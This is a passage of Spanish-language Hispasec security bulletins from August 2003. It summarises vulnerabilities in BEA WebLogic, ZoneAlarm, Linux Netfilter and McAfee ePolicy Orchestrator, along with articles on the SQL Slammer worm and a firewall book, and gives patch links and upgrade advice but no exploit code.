ftp://ftpna.beasys.com/pub/releases/security/CR105443_610sp2.jar

WebLogic Integration 2.1:
ftp://ftpna.beasys.com/pub/releases/security/tempPatchCR105536_WLI21SP2.zip

Parche para WebLogic Server 7.0 SP2:
ftp://ftpna.beasys.com/pub/releases/security/CR105443_70sp2-v2.jar

WebLogic Server 7.0
actualizar Service Pack 3 y aplicar el parche:
ftp://ftpna.beasys.com/pub/releases/security/CR105443_70sp3.jar

WebLogic Server 6.1
Actualizar a Service Pack 5 y aplicar el parche:
ftp://ftpna.beasys.com/pub/releases/security/CR105443_610sp5.jar

WebLogic Server 5.1
Actualizar a Service Pack 13 y aplicar el parche:
ftp://ftpna.beasys.com/pub/releases/security/CR105007_510sp13.jar


Antonio Román
roman@hispasec.com


Más información:

SECURITY ADVISORY (BEA03-36.00)
http://dev2dev.bea.com/resourcelibrary/advisoriesnotifications/SA_BEA03_36.00.jsp

BEA Systems, Inc:
http://www.bea.com

jueves, 7 de agosto de 2003

Vulnerabilidad local en firewalls ZoneAlarm

Se ha anunciado la existencia de una vulnerabilidad en el driver
instalado por el cortafuegos ZoneAlarm por la que un usuario local
podrá lograr la ejecución de código arbitrario con todos los
privilegios.

ZoneAlarm es un cortafuegos personal para ordenadores que ejecuten el
sistema operativo Windows que realiza dos funciones: evitar el acceso
no autorizado desde el exterior hacia el ordenador donde está
instalado el cortafuegos e identificar que aplicaciones están
accediendo a recursos externos.

Un usuario local puede enviar un mensaje especialmente creado al
VSDATANT TrueVector Device Driver para sobrescribir la memoria. De
esta forma, el usuario local podrá ganar privilegios en el ring0
(control total del sistema).

El usuario local deberá enviar una señal para sobrescribir una
dirección de memoria específica (que contenga el código arbitrario del
usuario) y después enviar una segunda señal que provoque el salto del
sistema a código alimentado por el atacante.


Antonio Ropero
antonior@hispasec.com


Más información:

ZoneAlarm Buffer Overflow in VSDATANT Device Driver Yields System
Privileges to Local Users
http://www.securitytracker.com/alerts/2003/Aug/1007420.html

Local ZoneAlarm Firewall (probably all versions - tested on v3.1)
Device Driver vulnerability
http://sec-labs.hack.pl/advisories/seclabs-adv-zone-alarm-04-08-2003.txt

Win32 Device Drivers Communication Vulnerabilities
http://sec-labs.hack.pl/papers/win32ddc.php

ZoneAlarm
http://www.zonelabs.com/store/content/home.jsp

miércoles, 6 de agosto de 2003

Denegación de servicio en Linux con Netfilter

Recientemente han aparecido dos vulnerabilidades sobre
Netfilter/Iptables que se distribuye como subsistema de cortafuegos
con los núcleos más recientes de linux (2.4, 2.5). Este otorga la
posibilidad tanto de filtrado y manejo de paquetes como distintos
tipos de NAT (traducción de direcciones de red).

El primer tipo de DoS afecta a los núcleos 2.4.20 y los últimos 2.5
con CONFIG_IP_NF_NAT_FTP o CONFIG_IP_NF_NAT_IRC activados o con los
módulos de ip_nat_ftp o ip_nat_irc cargados cuando los paquetes de
tanto de ftp como de irc no están prohibidos.

Se recomienda actualizar a la última versión del núcleo, en caso de no
ser posible siempre se puede prohibir la iniciación de conexiones NAT
de irc y ftp a usuarios que carecen de nuestra confianza.

El segundo tipo de DoS solo afecta a los núcleos 2.4.20 con
CONFIG_IP_NF_CONNTRACK activado o el modulo ip_conntrack cargado. El
problema viene dado tras los cambios introducidos en esta versión en
las listas enlazadas y la asignación de un timeout muy alto para las
conexiones no confirmadas (aquellas que han pasado únicamente en una
dirección y aun no en la otra).

Igualmente desde Hispasec recomendamos actualizar a la última versión
para atajar ambos problemas. Es posible también aplicar los parches
disponibles en las notas de alertas que enlazamos mas abajo.


Francisco Javier Santos
fsantos@hispasec.com


Más información:

Netfilter Security Advisory: NAT Remote DOS (SACK mangle)
http://www.netfilter.org/security/2003-08-01-nat-sack.html

Netfilter Security Advisory: Conntrack list_del() DoS
http://www.netfilter.org/security/2003-08-01-listadd.html

martes, 5 de agosto de 2003

SQL Slammer al descubierto

Se publica un interesantísimo artículo describiendo el funcionamiento
del gusano "SQL Slammer", que arrasó Internet el pasado Enero en apenas
10 minutos.

El "SQL Slammer" es un gusano para entornos Microsoft Windows que
aprovecha una vulnerabilidad de las bases de datos SQL de Microsoft.
Este gusano, de apenas 376 bytes de longitud, causó una auténtica
pesadilla el sábado 25 de Enero de 2003, barriendo Internet en pocos
minutos, colapsando líneas de datos y redes de área local, bloqueando
conmutadores y haciendo saltar todas las alarmas.

Hispasec se hizo eco del hecho casi en tiempo real, y hemos publicado
varios boletines en este mismo medio. En concreto el artículo de
Bernardo Quintero publicado el día 27 merece una relectura veraniega. En
esta ocasión, sin embargo, nos hacemos eco de un interesante artículo
publicado en la revista "Wired".

El artículo, cinco meses después de lo ocurrido, ofrece un punto de
vista simple y divulgativo. Lectura veraniega interesante, asequible
para todos los públicos.


Jesús Cea Avión
jcea@hispasec.com


Más información:

SQL Slammer al descubierto
http://barrapunto.com/article.pl?sid=03/06/07/2125251

Slammed!
An inside view of the worm that crashed the Internet in 15 minutes.
http://www.wired.com/wired/archive/11.07/slammer.html

Wired To Publish Slammer Source Code
http://slashdot.org/article.pl?sid=03/06/06/0445215

26/01/2003 - Alerta: Gusano para MS-SQL
http://www.hispasec.com/unaaldia/1554

27/01/2003 - Lecciones del gusano MS-SQL
http://www.hispasec.com/unaaldia/1555

SAPPHIRE WORM CODE DISASSEMBLED
http://www.eeye.com/html/Research/Flash/sapphire.txt

El Sapphire/Slammer SQL Worm, untando al planeta
http://barrapunto.com/article.pl?sid=03/02/01/1439204

Wired to publish Slammer code
http://www.theregister.co.uk/content/56/31083.html

Wired magazine story to detail Slammer Web attack
http://www.forbes.com/technology/newswire/2003/06/05/rtr992583.html

Slammed
http://paulboutin.weblogger.com/2003/06/04

WIRED GIVES VIRUS CODE TO SLAMMER
http://nypost.com/technology/443.htm

Analysis of the Sapphire Worm - A joint effort of CAIDA, ICSI, Silicon
Defense, UC Berkeley EECS and UC San Diego CSE
http://www.caida.org/analysis/security/sapphire/

CERT® Advisory CA-2003-04 MS-SQL Server Worm
http://www.cert.org/advisories/CA-2003-04.html

lunes, 4 de agosto de 2003

Bibliografía online sobre cortafuegos y seguridad en Internet

Coincidiendo con la publicación de la segunda edición de "Firewalls and
Internet Security: Repelling the Wily Hacker", sus autores han publicado
la primera edición, online y de forma gratuita.

La primera edición de "Firewalls and Internet Security: Repelling the
Wily Hacker" es un libro escrito por William R. Cheswick y Steven M.
Bellovin, reconocidos especialistas en el campo de la seguridad
informática. Publicado en 1994, hace casi diez años, se trata de un
texto anticuado, pero su lectura proporciona una perspectiva histórica
interesante y útil para aquellas personas interesadas en la seguridad
informática y su evolución durante la última década.

El libro consta de 14 capítulos y tres apéndices, divididos en cuatro
secciones: introducción, construcción de un cortafuegos, ataques y temas
legales, cifrado y bibliografía avanzada. En total, 320 páginas. Se
pueden descargar los capítulos en PDF, ocupando apenas 1.5 Mbytes.

Lectura retrospectiva interesante para estas calurosas tardes (en el
hemisferio norte) de Agosto.


Jesús Cea Avión
jcea@hispasec.com


Más información:

Firewalls and Internet Security: Repelling the Wily Hacker
First Edition
http://www.wilyhacker.com/1e/

Firewalls and Internet Security: Repelling the Wily Hacker
Second Edition
http://www.research.att.com/~smb/fw-insec2/

Firewalls and Internet Security, 2nd Ed.
http://books.slashdot.org/books/03/03/01/203220.shtml

domingo, 3 de agosto de 2003

Vulnerabilidades en McAfee ePolicy Orchestrator

Se han identificado múltiples vulnerabilidades en ePolicy Orchestrator
que pueden permitir a un usuario malicioso elevar sus privilegios o
conseguir acceso en el sistema.

McAfee Security ePolicy Orchestrator es una herramienta de
administración de antivirus empresarial que permite la gestión de
políticas e informes de forma centralizada. Lo que permite a los
administradores de las empresas dirigir los productos antivirus
de toda la corporación, incluidos servidores y estaciones de trabajo.

Mediante el envío de una petición HTTP especialmente creada al
servidor ePolicy Orchestrator es posible conseguir el archivo de
configuración que contiene el nombre de usuario y contraseña de la
cuenta MSDE SA. Aunque la password está cifrada con una variante del
DES y la clave secreta está almacenada en una DLL.

Esto permite a un usuario malicioso conseguir privilegios
administrativos (SA) en MSDE. Además, MSDE corre con privilegios
"SYSTEM" lo que permite al usuario malicioso conseguir el control de
todo el sistema. Este problema afecta a ePolicy Orchestrator 2 y 3.

La segunda vulnerabilidad anunciada permite que un atacante, mediante
el envío de una petición HTTP POST maliciosa al servidor con una
cadena especialmente creada, logre la ejecución arbitraria de código o
la caída del servicio HTTP. El problema reside en que el servidor
falla al tratar formatos de cadenas cuando la autenticación falla las
resoluciones de nombres.

Por último, mediante el envío de una petición HTTP POST de gran tamaño
al cliente, es posible provocar un desbordamiento de búfer. Esto hace
que el servicio deje de funcionar, pero incluso puede llevar a una
ejecución de código. Estos dos últimos problemas afectan a ePolicy
Orchestrator 2.

Se han publicado las actualizaciones necesarias para evitar este
problema:
http://www.networkassociates.com/us/downloads/updates/hotfixes.asp


Antonio Ropero
antonior@hispasec.com


Más información:

ePolicy Orchestrator Multiple Vulnerabilities
http://www.atstake.com/research/advisories/2003/a073103-1.txt

Network Associates Security Bulletin 07/31/03
http://www.nai.com/us/promos/mcafee/epo_vulnerabilities.asp

McAfee Security ePolicy Orchestrator
http://www.networkassociates.com/us/products/mcafee/antivirus/fileserver/epo.htm